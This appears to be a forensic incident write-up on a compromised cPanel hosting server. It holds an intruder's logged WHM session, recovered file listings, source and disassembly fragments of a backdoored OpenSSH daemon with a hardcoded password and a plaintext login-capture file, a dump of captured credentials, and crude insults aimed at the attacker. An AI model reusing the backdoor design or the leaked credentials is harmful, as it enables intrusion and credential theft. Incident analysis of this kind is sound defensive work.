"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:28:02 -0000] "GET /3rdparty/phpMyAdmin/sql.php?db=webhostl_hosting&table=whl_users&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_hosting&token=8ca1ba8833931bc463e18a0da900681e&table=whl_users" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:28:05 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124 HTTP/1.1" 200 0 
"https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=webhostl_hosting&table=whl_users&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:28:39 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:28:50 -0000] "GET /scripts/modwheel HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:29:20 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:30:01 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:30:08 -0000] "GET /scripts4/listaccts HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:30:24 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:30:43 -0000] "GET /scripts/edituser?domain=crownvipservices.com&user=crownvip HTTP/1.1" 0 
"https://srv01.webhostline.com:2087/scripts4/listaccts" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:30:46 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:30:52 -0000] "GET /scripts4/listaccts HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:31:25 -0000] "GET /scripts/editsets HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:31:28 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:31:48 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:31:51 -0000] "POST /scripts/saveedits HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/editsets" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root [06/08/2009:13:32:01 -0000] "GET /scripts4/listaccts HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" 188.54.114.181 - root 
[06/08/2009:13:32:10 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:32:11 -0000] "GET /scripts/passwdlist HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:32:12 -0000] "GET /cPanel_magic_revision_1200442320/passbar/passbar.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:32:12 -0000] "GET /cPanel_magic_revision_1231994908/passbar/password_strength_optimized.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:32:13 -0000] "GET /cPanel_magic_revision_1231994899/yui/autocomplete/assets/skins/sam/autocomplete.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:32:14 -0000] "GET /cPanel_magic_revision_1186549334/js/pkg_hover.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:32:14 -0000] "GET /cPanel_magic_revision_1231994883/yui/datasource/datasource.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:32:15 -0000] "GET /cPanel_magic_revision_1231994899/yui/autocomplete/autocomplete.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:32:18 -0000] "GET /xml-api/accountsummary?user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:32:26 -0000] "GET /cPanel_magic_revision_1159323796/yui/container/assets/close12_1.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/cPanel_magic_revision_1231994907/themes/x/style_optimized.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:32:29 -0000] "GET /yui/treeview/assets/loading.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:32:31 -0000] "GET /scripts/display_package_info?pkg=Basic HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:32:32 -0000] "POST /scripts/passwd HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:32:52 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:33:13 -0000] "GET /scripts2/securitycenter HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:33:29 -0000] "GET /scripts/modwheel HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:33:41 -0000] "GET /scripts/addwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:33:53 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:34:35 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:34:39 -0000] "GET /scripts2/manageshells HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:34:49 -0000] "GET /scripts2/domanageshells?shell=Enable+Normal+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:35:16 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:36:18 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:37:19 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:38:00 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:39:01 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:39:49 -0000] "GET /scripts/modwheel HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:39:57 -0000] "GET /scripts/rmwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:40:02 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:40:13 -0000] "GET /scripts2/manageshells HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:40:18 -0000] "GET /scripts2/domanageshells?shell=Enable+Jailed+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:40:23 -0000] "GET /scripts/editsets HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:40:31 -0000] "POST /scripts/saveedits HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/editsets" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:40:40 -0000] "GET /logout/ HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:13:40:41 -0000] "GET /logout/ HTTP/1.1" 401 0 "https://srv01.webhostline.com:2087/scripts/command?PFILE=topframe.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - - [06/08/2009:13:40:46 -0000] "GET /3rdparty/phpMyAdmin/db_structure.php?db=webhostl_hosting&token=8ca1ba8833931bc463e18a0da900681e HTTP/1.1" 401 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?server=1&token=8ca1ba8833931bc463e18a0da900681e&db=webhostl_hosting&table=tblclients&lang=en-utf-8&collation_connection=utf8_unicode_ci" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
root@srv01 [/home/recovery]#

root@srv01 [/home/recovery/]# cat /tmp/access_log | grep "06/08" | grep crownvip | grep -v 91.184
188.54.114.181 - root [06/08/2009:13:30:43 -0000] "GET /scripts/edituser?domain=crownvipservices.com&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts4/listaccts" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:32:18 -0000] "GET /xml-api/accountsummary?user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:33:41 -0000] "GET /scripts/addwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:34:49 -0000] "GET /scripts2/domanageshells?shell=Enable+Normal+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:39:57 -0000] "GET /scripts/rmwheel?compilers=0&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/modwheel" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
188.54.114.181 - root [06/08/2009:13:40:18 -0000] "GET /scripts2/domanageshells?shell=Enable+Jailed+Shell&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts2/manageshells" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)"
root@srv01 [/home/recovery]#

/*
RoMeO clearly has an issue with self image (probably to a tiny penis) and
feels the need to fake things like breaking out of a jail shell to make
himself feel better. In fact, I'll bet that RoMeO couldn't hack his way out
of a wet tissue paper bag with a knife.
*/

root@srv01 [/home/recovery]# du -h /tmp/access_log
13M access_log
root@srv01 [/home/recovery]#

root@srv01 [/home/recovery]# strings /dev/sdb2 > stringfile_sdb2.txt
root@srv01 [/home/recovery]# cat stringfile_sdb2.txt | head -n 25
M0J
/var
4JcA.JcA.J
runt+found
cache
empty
games
local
lock
nisl
mail
preserve
spool
crash
racoon
account
cpanel
named
portsentry
aquota.userr.bz2
profiles
quota.user
netenberg
haxtar.gz
ll.tar

/*
A forensic investigation demonstrated that RoMeO was full of shit again.
Clearly there was no grsec local exploit and certainly no jailshell break
tool or technique. During the investigation we identified two suspicious
files that were ll.tar and haxtar.gz. Those were in fact logpatch v1.1 (he
can't write his own tools) and a real "weak" attempt of modifying the
OpenSSH daemon to add a backdoor.
*/

root@srv01 [/home/recovery]# cat sdb2output.txt | grep -A 1 hax
d/d * 983041(realloc): hax
r/r * 98310: ll.tar
root@srv01 [/home/recovery]#

/*
With the use of sleuthkit in our investigation we validated the existence
of the hax directory and the ll.tar file on /dev/sdb2
*/

root@srv01 [/home/recovery]# cat stringfile_sdb2.txt | grep hax
haxtar.gz
hax.tar
hax/
hax/auth-sia.c
hax/msg.h
hax/fatal.c
hax/config.guess
hax/progressmeter.h
hax/hostfile.c
hax/sftp-client.h
hax/includes.h
hax/serverloop.h
hax/session.c
hax/ssh-agent.c
hax/scp.c
hax/loginrec.c
hax/bufaux.c
hax/auth-pam.h
hax/auth-sia.h
hax/ttymodes.h
hax/ssh-keygen.0
hax/auth-rh-rsa.c
hax/auth-passwd.c
hax/key.h
hax/packet.c
hax/rsa.c
hax/compat.h
hax/authfile.c
hax/ssh-keysign.8
hax/auth1.c
hax/readconf.c
hax/ssh2.h
hax/bufaux.h
hax/sftp.0
hax/scard.c
hax/README.platform
hax/WARNING.RNG
hax/ssh_config.0
hax/dns.c
hax/.cvsignore
hax/auth-krb5.c
hax/misc.h
hax/auth2-kbdint.c
hax/kex.c
hax/sftp-common.c
hax/log.c
hax/entropy.c
hax/sshlogin.c
hax/servconf.h
hax/cipher-aes.c
hax/atomicio.c
hax/xmalloc.c
hax/fixpaths
hax/sshtty.c
hax/fixprogs
hax/ttymodes.c
hax/auth.c
hax/auth2-pubkey.c
hax/dispatch.h
hax/rijndael.h
hax/misc.c
hax/sftp-server.c
hax/sshd.c
hax/scard-opensc.c
hax/serverloop.c
hax/readpass.c
hax/rsa.h
hax/ssh-keysign.c
hax/canohost.h
hax/ssh.0
hax/aclocal.m4
hax/ssh-rand-helper.0
hax/deattack.h
hax/auth-bsdauth.c
hax/gss-serv.c
hax/monitor.h
hax/monitor_mm.h
hax/entropy.h
hax/ChangeLog
hax/log.h
hax/sshconnect.c
hax/kexgex.c
hax/sftp-server.0
hax/auth.h
hax/deattack.c
hax/channels.c
hax/ssh-keygen.1
hax/version.h
hax/sftp-glob.c
hax/nchan2.ms
hax/kexdhs.c
hax/ssh.1
hax/groupaccess.h
hax/rijndael.c
hax/ssh_prng_cmds.in
hax/cipher-3des1.c
hax/mac.c
hax/configure
hax/cipher-ctr.c
hax/ssh-add.c
hax/gss-genr.c
hax/scp.1
hax/TODO
hax/acss.c
hax/loginrec.h
hax/sftp-client.c
hax/progressmeter.c
hax/md5crypt.h
hax/opensshd.init.in
hax/moduli.c
hax/uuencode.c
hax/config.h.in
hax/buildpkg.sh.in
hax/auth2-gss.c
hax/nchan.c
hax/cleanup.c
hax/msg.c
hax/mac.h
hax/cipher-bf1.c
hax/kexdh.c
hax/auth-options.c
hax/moduli
hax/hostfile.h
hax/install-sh
hax/sshpty.h
hax/cipher.h
hax/auth-options.h
hax/monitor_wrap.h
hax/configure.ac
root@srv01 [/home/recovery]#

// Familiar filenames for an unfamiliar, poorly coded backdoor

root@srv01 [/home/recovery/sdb2recover/hax]# cat includes.h | grep -i hookar -A1 -B1
#define hookar "0x3aownt"
#define HOOKAR_LG "/etc/module-"
int hookarOn;
root@srv01 [/home/recovery/sdb2recover/hax]#

root@srv01 [/home/recovery]# cat stringfile_sdb2.txt | grep -B 10 module-
# undef _INCLUDE__STDC__
# endif
#endif
#include /* For OPENSSL_VERSION_NUMBER */
#include "defines.h"
#include "version.h"
#include "openbsd-compat/openbsd-compat.h"
#include "openbsd-compat/bsd-nextstep.h"
#include "entropy.h"
#define hookar "0x3aownt"
#define HOOKAR_LG "/etc/module-"

/*
Partial source code recovered showing backdoor password. The rest of the
code revealed the incoming password logging that took place in /etc/module-
which was used to hold captured data in plaintext form
*/

root@srv01 [/home/recovery]# cat etc/module- | head -n 10
login in: webhostl:kb>w5I@T&yK|
login in: webhostl:kb>w5I@T&yK|
login in: webhostl:kb>w5I@T&yK|
login in: webhostl:kb>w5I@T&yK|
login in: webhostl:kb>w5I@T&yK|
login in: x00mario:!&8bmHvt4--$
login in: webhostl:kb>w5I@T&yK|
login in: x00mario:!&8bmHvt4--$
login in: webhostl:kb>w5I@T&yK|
login in: webhostl:kb>w5I@T&yK|
root@srv01 [/home/recovery]#

chkrootkit reports 1 deletion of record:

Checking `chkutmp'... The tty of the following user process(es) were not found in /var/run/utmp !
! RUID          PID TTY    CMD
! root         5193 tty2   /sbin/mingetty tty2
! root         5194 tty3   /sbin/mingetty tty3
! root         5197 tty4   /sbin/mingetty tty4
! root         5211 tty5   /sbin/mingetty tty5
! root         5216 tty6   /sbin/mingetty tty6
chkutmp: nothing deleted
Checking `wted'... 1 deletion(s) between Tue Jun 8 11:40:56 2009 and Tue Jun 8 11:46:30 2009

Infected SSHD Binary Reverse Code Engineering
---------------------------------------------

//Global definitions
FILE *log; //A pointer to the password dump file
char *EtcModule = "/etc/module-"; //filename array of chars
char *a0x3aownt = "0x3aownt"; // hardcoded backdoor password
int hookarOn; //A backdoor authentication flag

//Standard passwd struct defined in pwd.h
struct passwd {
    char *pw_name;
    char *pw_passwd;
    uid_t pw_uid;
    gid_t pw_gid;
    time_t pw_change;
    char *pw_class;
    char *pw_gecos;
    char *pw_dir;
    char *pw_shell;
    time_t pw_expire;
};

//OpenSSH Authctxt struct defined in auth.h
struct Authctxt {
    int success;
    int postponed; /* authentication needs another step */
    int valid; /* user exists and is allowed to login */
    int attempt;
    int failures;
    int force_pwchange;
    char *user; /* username sent by the client */
    char *service;
    struct passwd *pw; /* set if 'valid' */
    char *style;
    void *kbdintctxt;
#ifdef BSD_AUTH
    auth_session_t *as;
#endif
#ifdef KRB5
    krb5_context krb5_ctx;
    krb5_ccache krb5_fwd_ccache;
    krb5_principal krb5_user;
    char *krb5_ticket_file;
    char *krb5_ccname;
#endif
    Buffer *loginmsg;
    void *methoddata;
};

/*
.text:0804FA68 public sys_auth_passwd
.text:0804FA68 sys_auth_passwd proc near ; CODE XREF: auth_password+71p
.text:0804FA68
.text:0804FA68 arg_0 = dword ptr 8
.text:0804FA68 arg_4 = dword ptr 0Ch
.text:0804FA68
.text:0804FA68 push ebp
.text:0804FA69 mov ebp, esp
.text:0804FA6B push edi
.text:0804FA6C push esi
.text:0804FA6D push ebx
.text:0804FA6E sub esp, 0Ch
.text:0804FA71 mov eax, [ebp+arg_0] ; eax = authctxt
.text:0804FA74 mov ebx, [eax+8]
.text:0804FA77 test ebx, ebx
.text:0804FA79 mov edi, [ebp+arg_4] ; edi = password
.text:0804FA7C mov esi, [eax+20h] ; esi = authctxt->pw
.text:0804FA7F jnz loc_804FB28
.text:0804FA85 mov ebx, [esi+4]
.text:0804FA88
.text:0804FA88 loc_804FA88: ; CODE XREF: sys_auth_passwd+CEj
.text:0804FA88 mov al, [ebx]
.text:0804FA8A test al, al
.text:0804FA8C jnz short loc_804FA98
.text:0804FA8E cmp byte ptr [edi], 0
.text:0804FA91 mov edx, 1
.text:0804FA96 jz short loc_804FABD
.text:0804FA98
.text:0804FA98 loc_804FA98: ; CODE XREF: sys_auth_passwd+24j
.text:0804FA98 sub esp, 8
.text:0804FA9B test al, al
.text:0804FA9D jnz short loc_804FAC8
.text:0804FA9F
.text:0804FA9F loc_804FA9F: ; CODE XREF: sys_auth_passwd+66j
.text:0804FA9F mov eax, offset aXx ; "xx"
.text:0804FAA4 push eax
.text:0804FAA5 push edi
.text:0804FAA6 call xcrypt
.text:0804FAAB pop edx
.text:0804FAAC pop ecx
.text:0804FAAD push ebx ; s2
.text:0804FAAE push eax ; s1
.text:0804FAAF call _strcmp
.text:0804FAB4 add esp, 10h
.text:0804FAB7 xor edx, edx
.text:0804FAB9 test eax, eax
.text:0804FABB jz short loc_804FAEC
.text:0804FABD
.text:0804FABD loc_804FABD: ; CODE XREF: sys_auth_passwd+2Ej
.text:0804FABD ; sys_auth_passwd+7Fj
.text:0804FABD lea esp, [ebp-0Ch]
.text:0804FAC0 pop ebx
.text:0804FAC1 pop esi
.text:0804FAC2 mov eax, edx
.text:0804FAC4 pop edi
.text:0804FAC5 leave
.text:0804FAC6 retn
.text:0804FAC6 ; ---------------------------------------------------------------------------
.text:0804FAC7 align 4
.text:0804FAC8
.text:0804FAC8 loc_804FAC8: ; CODE XREF: sys_auth_passwd+35j
.text:0804FAC8 cmp byte ptr [ebx+1], 0
.text:0804FACC mov eax, ebx
.text:0804FACE jz short loc_804FA9F
